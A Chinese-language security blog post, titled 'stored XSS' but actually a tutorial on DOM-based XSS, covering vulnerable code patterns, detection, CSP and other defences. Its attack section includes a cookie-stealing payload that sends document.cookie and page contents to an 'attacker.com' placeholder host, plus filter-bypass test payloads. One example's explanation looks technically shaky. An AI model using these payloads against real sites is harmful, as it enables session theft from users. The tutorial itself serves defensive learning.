<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width">
<meta name="theme-color" content="#222"><meta name="generator" content="Hexo 7.3.0">

  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css" integrity="sha256-dABdfBfUoC8vJUBOwGVdm8L9qlMWaHTIfXt+7GnZCIo=" crossorigin="anonymous">
  <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/animate.css/3.1.1/animate.min.css" integrity="sha256-PR7ttpcvz8qrF57fur/yAx1qXMFJeJFiA6pSzWi0OIE=" crossorigin="anonymous">

<script class="next-config" data-name="main" type="application/json">{"hostname":"zifeiyu-sec.github.io","root":"/","images":"/images","scheme":"Gemini","darkmode":false,"version":"8.23.2","exturl":false,"sidebar":{"position":"left","width_expanded":320,"width_dual_column":240,"display":"post","padding":18,"offset":12},"hljswrap":true,"codeblock":{"theme":{"light":"default","dark":"stackoverflow-dark"},"prism":{"light":"prism","dark":"prism-dark"},"copy_button":{"enable":false,"style":null},"fold":{"enable":false,"height":500},"language":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"stickytabs":false,"motion":{"enable":true,"async":false,"duration":200,"transition":{"menu_item":"fadeInDown","post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}}</script><script src="/js/config.js" defer></script>

    <meta name="description" content="DOM型XSS（Document Object Model Cross-Site Scripting）** 是一种完全发生在客户端的跨站脚本攻击，恶意代码通过操纵页面的DOM结构触发执行，无需服务器端参与，隐蔽性极强。">
<meta property="og:type" content="article">
<meta property="og:title" content="存储型xss">
<meta property="og:url" content="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/index.html">
<meta property="og:site_name" content="子非鱼的博客">
<meta property="og:description" content="DOM型XSS（Document Object Model Cross-Site Scripting）** 是一种完全发生在客户端的跨站脚本攻击，恶意代码通过操纵页面的DOM结构触发执行，无需服务器端参与，隐蔽性极强。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2025-08-06T02:31:57.000Z">
<meta property="article:modified_time" content="2025-08-07T02:40:33.696Z">
<meta property="article:author" content="子非鱼">
<meta property="article:tag" content="安全">
<meta property="article:tag" content="Web">
<meta property="article:tag" content="XSS">
<meta property="article:tag" content="XSS漏洞类型">
<meta property="article:tag" content="Web安全">
<meta property="article:tag" content="存储型XSS">
<meta name="twitter:card" content="summary">


<link rel="canonical" href="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/">


<script class="next-config" data-name="page" type="application/json">{"sidebar":"","isHome":false,"isPost":true,"lang":"zh-CN","comments":true,"permalink":"http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/","path":"2025/08/06/Web漏洞/XSS漏洞/存储型xss/","title":"存储型xss"}</script>

<script class="next-config" data-name="calendar" type="application/json">""</script>
<title>存储型xss | 子非鱼的博客</title>
  








  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous" defer></script>
<script src="/js/utils.js" defer></script><script src="/js/motion.js" defer></script><script src="/js/sidebar.js" defer></script><script src="/js/next-boot.js" defer></script>

  






  





  <noscript>
    <link rel="stylesheet" href="/css/noscript.css">
  </noscript>
</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <div class="column">
      <header class="header" itemscope itemtype="http://schema.org/WPHeader"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏" role="button">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <p class="site-title">子非鱼的博客</p>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">在时间的尺度上，一切问题都有答案</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger" aria-label="搜索" role="button">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu"><li class="menu-item menu-item-home"><a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a></li><li class="menu-item menu-item-tags"><a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a></li><li class="menu-item menu-item-categories"><a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a></li><li class="menu-item menu-item-archives"><a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a></li><li class="menu-item menu-item-about"><a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a></li>
  </ul>
</nav>




</header>
        
  
  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <div class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#DOM%E5%9E%8BXSS%E6%BC%8F%E6%B4%9E%EF%BC%9A%E5%8E%9F%E7%90%86%E3%80%81%E6%94%BB%E5%87%BB%E4%B8%8E%E9%98%B2%E5%BE%A1%E6%8C%87%E5%8D%97"><span class="nav-number">1.</span> <span class="nav-text">DOM型XSS漏洞：原理、攻击与防御指南</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86%E4%B8%8E%E7%89%B9%E7%82%B9"><span class="nav-number">1.1.</span> <span class="nav-text">一、漏洞原理与特点</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%8C%E3%80%81%E6%94%BB%E5%87%BB%E5%9C%BA%E6%99%AF%E4%B8%8E%E6%A1%88%E4%BE%8B"><span class="nav-number">1.2.</span> <span class="nav-text">二、攻击场景与案例</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%B8%89%E3%80%81%E6%BC%8F%E6%B4%9E%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="nav-number">1.3.</span> <span class="nav-text">三、漏洞检测方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E9%98%B2%E5%BE%A1%E6%96%B9%E6%A1%88"><span class="nav-number">1.4.</span> <span class="nav-text">四、防御方案</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BA%94%E3%80%81%E4%BC%81%E4%B8%9A%E7%BA%A7%E9%98%B2%E6%8A%A4%E4%BD%93%E7%B3%BB"><span class="nav-number">1.5.</span> <span class="nav-text">五、企业级防护体系</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">2.</span> <span class="nav-text">总结</span></a></li></ol></div>
        </div>
        <!--/noindex-->

        <div class="site-overview-wrap sidebar-panel">
          <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="子非鱼"
      src="/images/1.png">
  <p class="site-author-name" itemprop="name">子非鱼</p>
  <div class="site-description" itemprop="description">学习过程的记录</div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        <a href="/archives/">
          <span class="site-state-item-count">20</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
          <a href="/categories/">
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
          <a href="/tags/">
        <span class="site-state-item-count">20</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author animated">
      <span class="links-of-author-item">
        <a href="https://github.com/zifeiyu-sec" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;zifeiyu-sec" rel="noopener me" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://gitee.com/zifeiyu-sec" title="Gitee → https:&#x2F;&#x2F;gitee.com&#x2F;zifeiyu-sec" rel="noopener me" target="_blank"><i class="fa fa-envelope fa-fw"></i>Gitee</a>
      </span>
  </div>

        </div>
      </div>
    </div>

    
    <div class="sidebar-inner sidebar-blogroll">
      <div class="links-of-blogroll animated">
        <div class="links-of-blogroll-title"><i class="fa fa-globe fa-fw"></i>
          链接
        </div>
        <ul class="links-of-blogroll-list">
            <li class="links-of-blogroll-item">
              <a href="https://example.com/" title="https:&#x2F;&#x2F;example.com" rel="noopener" target="_blank">Title</a>
            </li>
        </ul>
      </div>
    </div>
  </aside>


    </div>

    <div class="main-inner post posts-expand">


  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zifeiyu-sec.github.io/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%AD%98%E5%82%A8%E5%9E%8Bxss/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/1.png">
      <meta itemprop="name" content="子非鱼">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="子非鱼的博客">
      <meta itemprop="description" content="学习过程的记录">
    </span>

    <span hidden itemprop="post" itemscope itemtype="http://schema.org/CreativeWork">
      <meta itemprop="name" content="存储型xss | 子非鱼的博客">
      <meta itemprop="description" content="DOM型XSS（Document Object Model Cross-Site Scripting）** 是一种完全发生在客户端的跨站脚本攻击，恶意代码通过操纵页面的DOM结构触发执行，无需服务器端参与，隐蔽性极强。">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          存储型xss
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2025-08-06 10:31:57" itemprop="dateCreated datePublished" datetime="2025-08-06T10:31:57+08:00">2025-08-06</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar-check"></i>
      </span>
      <span class="post-meta-item-text">更新于</span>
      <time title="修改时间：2025-08-07 10:40:33" itemprop="dateModified" datetime="2025-08-07T10:40:33+08:00">2025-08-07</time>
    </span>
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-folder"></i>
      </span>
      <span class="post-meta-item-text">分类于</span>
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">Web漏洞</span></a>
        </span>
          ，
        <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
          <a href="/categories/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/" itemprop="url" rel="index"><span itemprop="name">XSS漏洞</span></a>
        </span>
    </span>

  
</div>

            <div class="post-description">DOM型XSS（Document Object Model Cross-Site Scripting）** 是一种完全发生在客户端的跨站脚本攻击，恶意代码通过操纵页面的DOM结构触发执行，无需服务器端参与，隐蔽性极强。</div>
        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody"><p>以下是一篇关于<strong>DOM型XSS漏洞</strong>的技术文章，结合漏洞原理、攻击案例、检测方法及防御方案，所有涉及代码的部分均以代码块形式呈现：</p>
<hr>
<h3 id="DOM型XSS漏洞：原理、攻击与防御指南"><a href="#DOM型XSS漏洞：原理、攻击与防御指南" class="headerlink" title="DOM型XSS漏洞：原理、攻击与防御指南"></a>DOM型XSS漏洞：原理、攻击与防御指南</h3><p><strong>DOM型XSS（Document Object Model Cross-Site Scripting）</strong> 是一种完全发生在客户端的跨站脚本攻击，恶意代码通过操纵页面的DOM结构触发执行，无需服务器端参与，隐蔽性极强。</p>
<hr>
<h4 id="一、漏洞原理与特点"><a href="#一、漏洞原理与特点" class="headerlink" title="一、漏洞原理与特点"></a>一、漏洞原理与特点</h4><ol>
<li><p><strong>核心机制</strong><br> 攻击者构造恶意URL，诱导用户访问。客户端JavaScript从URL参数、<code>location.hash</code> 或浏览器存储（如<code>localStorage</code>）中读取数据，通过不安全的DOM操作（如 <code>innerHTML</code>、<code>document.write()</code>）将恶意脚本插入页面并执行。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 漏洞代码示例：直接使用 location.hash 插入DOM</span><br><span class="line">const userContent = window.location.hash.substring(1);</span><br><span class="line">document.getElementById(&#x27;output&#x27;).innerHTML = userContent; // 高危操作！</span><br></pre></td></tr></table></figure>

<p>攻击URL示例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://victim.com/#&lt;img src=x onerror=alert(document.cookie)&gt;</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>与传统XSS的区别</strong></p>
<table>
<thead>
<tr>
<th><strong>特征</strong></th>
<th><strong>反射型&#x2F;存储型XSS</strong></th>
<th><strong>DOM型XSS</strong></th>
</tr>
</thead>
<tbody><tr>
<td><strong>攻击位置</strong></td>
<td>服务器返回恶意脚本</td>
<td>客户端DOM操作触发</td>
</tr>
<tr>
<td><strong>数据流</strong></td>
<td>经过服务器处理</td>
<td>完全在客户端完成</td>
</tr>
<tr>
<td><strong>可见性</strong></td>
<td>查看页面源码可见恶意脚本</td>
<td>页面源码中不可见</td>
</tr>
</tbody></table>
</li>
</ol>
<hr>
<h4 id="二、攻击场景与案例"><a href="#二、攻击场景与案例" class="headerlink" title="二、攻击场景与案例"></a>二、攻击场景与案例</h4><ol>
<li><p><strong>URL参数注入</strong><br> 页面JavaScript直接解析URL参数并动态生成DOM：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">// 从URL参数获取语言并加载脚本</span><br><span class="line">const lang = new URLSearchParams(location.search).get(&#x27;lang&#x27;);</span><br><span class="line">const script = document.createElement(&#x27;script&#x27;);</span><br><span class="line">script.src = `/static/$&#123;lang&#125;.js`; // 路径拼接漏洞</span><br><span class="line">document.body.appendChild(script);</span><br></pre></td></tr></table></figure>

<p>攻击者构造Payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://victim.com?lang=attacker&quot;;alert(1);//</span><br></pre></td></tr></table></figure>

<p>实际加载路径变为：<code>/static/attacker&quot;;alert(1);//.js</code>，触发XSS。</p>
</li>
<li><p><strong>客户端存储滥用</strong><br> 恶意脚本通过<code>localStorage</code>或<code>sessionStorage</code>持久化：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">// 从localStorage读取数据渲染页面</span><br><span class="line">const userData = localStorage.getItem(&#x27;userProfile&#x27;);</span><br><span class="line">document.querySelector(&#x27;.profile&#x27;).innerHTML = userData;</span><br></pre></td></tr></table></figure>

<p>攻击者通过其他漏洞（如反射型XSS）注入恶意数据到<code>localStorage</code>，后续页面加载时触发。</p>
</li>
<li><p><strong>数据外带技术</strong><br> 窃取Cookie并发送至攻击者服务器：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">// 双通道传输：JSONP + 图片信标</span><br><span class="line">&lt;img src=x onerror=&quot;</span><br><span class="line">  const data = &#123; cookie: document.cookie, dom: document.body.innerHTML &#125;;</span><br><span class="line">  // 通道1：JSONP传输完整数据</span><br><span class="line">  const script = document.createElement(&#x27;script&#x27;);</span><br><span class="line">  script.src = &#x27;https://attacker.com/steal?data=&#x27; + btoa(JSON.stringify(data));</span><br><span class="line">  // 通道2：图片信标备份关键信息</span><br><span class="line">  new Image().src = &#x27;https://attacker.com/log?c=&#x27; + encodeURIComponent(data.cookie);</span><br><span class="line">&quot;&gt;</span><br></pre></td></tr></table></figure>

<p>通过延时触发和随机化传输策略绕过WAF检测。</p>
</li>
</ol>
<hr>
<h4 id="三、漏洞检测方法"><a href="#三、漏洞检测方法" class="headerlink" title="三、漏洞检测方法"></a>三、漏洞检测方法</h4><ol>
<li><p><strong>手动测试Payload</strong></p>
<ul>
<li><p>基础验证：<code>&lt;svg/οnlοad=alert(1)&gt;</code>、<code>&#39;&quot;&gt;&lt;img src=x onerror=alert(1)&gt;</code></p>
</li>
<li><p>编码绕过：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;!-- JS Unicode编码 --&gt;</span><br><span class="line">&lt;img src=x onerror=&quot;\u0061\u006c\u0065\u0072\u0074(1)&quot;&gt;</span><br><span class="line">&lt;!-- 拆分字符串 --&gt;</span><br><span class="line">&lt;svg onload=&quot;top[&#x27;al&#x27;+&#x27;ert&#x27;](1)&quot;&gt;&lt;/svg&gt;</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><strong>自动化工具</strong></p>
<ul>
<li><strong>OWASP ZAP</strong>：扫描DOM操作中的输入点。</li>
<li><strong>浏览器开发者工具</strong>：审查DOM结构，跟踪用户输入的数据流。</li>
</ul>
</li>
</ol>
<hr>
<h4 id="四、防御方案"><a href="#四、防御方案" class="headerlink" title="四、防御方案"></a>四、防御方案</h4><ol>
<li><p><strong>安全的DOM操作</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">// 使用 textContent 替代 innerHTML</span><br><span class="line">document.getElementById(&#x27;output&#x27;).textContent = userContent;</span><br><span class="line">// 动态创建元素并设置属性</span><br><span class="line">const div = document.createElement(&#x27;div&#x27;);</span><br><span class="line">div.textContent = userContent; // 安全</span><br><span class="line">document.body.appendChild(div);</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>输入验证与输出编码</strong></p>
<ul>
<li><p>输入侧：白名单校验（如仅允许字母数字）</p>
</li>
<li><p>输出侧：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">// HTML实体编码</span><br><span class="line">function encodeHTML(str) &#123;</span><br><span class="line">  return str.replace(/[&amp;&lt;&gt;&quot;&#x27;]/g, m =&gt; `&amp;#$&#123;m.charCodeAt(0)&#125;;`);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ul>
</li>
<li><p><strong>内容安全策略（CSP）</strong><br> 配置HTTP头禁止内联脚本和外部域加载：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy: default-src &#x27;self&#x27;; script-src &#x27;self&#x27;; img-src &#x27;self&#x27; data:</span><br></pre></td></tr></table></figure>
</li>
<li><p><strong>框架安全实践</strong></p>
<ul>
<li><strong>React&#x2F;Vue</strong>：避免使用 <code>dangerouslySetInnerHTML</code> 或 <code>v-html</code>。</li>
<li><strong>自动转义</strong>：现代框架默认转义动态内容。</li>
</ul>
</li>
</ol>
<hr>
<h4 id="五、企业级防护体系"><a href="#五、企业级防护体系" class="headerlink" title="五、企业级防护体系"></a>五、企业级防护体系</h4><ol>
<li><strong>SDL流程集成</strong><ul>
<li>需求阶段：识别DOM操作风险点</li>
<li>代码审查：检查 <code>innerHTML</code>、<code>location</code> 相关操作</li>
<li>自动化测试：CI&#x2F;CD流水线集成XSS扫描</li>
</ul>
</li>
<li><strong>WAF规则优化</strong><br> 拦截包含<code>javascript:</code>协议、<code>onerror</code>事件等特征的请求。</li>
<li><strong>监控与应急</strong><ul>
<li>实时告警：检测异常数据外带请求（如大量图片信标）</li>
<li>日志审计：记录所有 <code>localStorage</code> 和 <code>sessionStorage</code> 写入操作</li>
</ul>
</li>
</ol>
<hr>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>DOM型XSS的本质是<strong>客户端代码对用户输入的无条件信任</strong>。防御需遵循三原则：</p>
<blockquote>
<ol>
<li><strong>永不信任客户端输入</strong>：所有来自URL、存储的数据均需验证。</li>
<li><strong>隔离代码与数据</strong>：使用安全的API（如 <code>textContent</code>）替代危险操作。</li>
<li><strong>纵深防御</strong>：CSP + 编码 + 框架安全特性叠加防护。</li>
</ol>
</blockquote>
<p><strong>漏洞挖掘箴言</strong>：</p>
<blockquote>
<p>“凡动态渲染处，皆需警惕；凡用户可控处，皆应消毒。” —— 源于企业SDL实践</p>
</blockquote>
<hr>
<p><strong>扩展资源</strong>：</p>
<ul>
<li>DOM XSS靶场：<a target="_blank" rel="noopener" href="http://prompt.ml/">http://prompt.ml</a></li>
<li>OWASP防护手册：<a target="_blank" rel="noopener" href="https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html">DOM-Based XSS Prevention Cheat Sheet</a></li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="reward-container">
  <div>请我一杯咖啡吧！</div>
  <button>
    赞赏
  </button>
  <div class="post-reward">
      <div>
        <img src="/images/wechatpay.png" alt="子非鱼 微信">
        <span>微信</span>
      </div>
      <div>
        <img src="/images/alipay.png" alt="子非鱼 支付宝">
        <span>支付宝</span>
      </div>

  </div>
</div>

          <div class="post-tags">
              <a href="/tags/%E5%AE%89%E5%85%A8/" rel="tag"># 安全</a>
              <a href="/tags/Web/" rel="tag"># Web</a>
              <a href="/tags/XSS/" rel="tag"># XSS</a>
              <a href="/tags/XSS%E6%BC%8F%E6%B4%9E%E7%B1%BB%E5%9E%8B/" rel="tag"># XSS漏洞类型</a>
              <a href="/tags/Web%E5%AE%89%E5%85%A8/" rel="tag"># Web安全</a>
              <a href="/tags/%E5%AD%98%E5%82%A8%E5%9E%8BXSS/" rel="tag"># 存储型XSS</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/%E5%8F%8D%E5%B0%84%E6%80%A7xss/" rel="prev" title="反射性xss">
                  <i class="fa fa-angle-left"></i> 反射性xss
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2025/08/06/Web%E6%BC%8F%E6%B4%9E/XSS%E6%BC%8F%E6%B4%9E/dom%E5%9E%8Bxss/" rel="next" title="dom型xss">
                  dom型xss <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2025</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">子非鱼</span>
  </div>
  <div class="powered-by">由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>

</body>
</html>
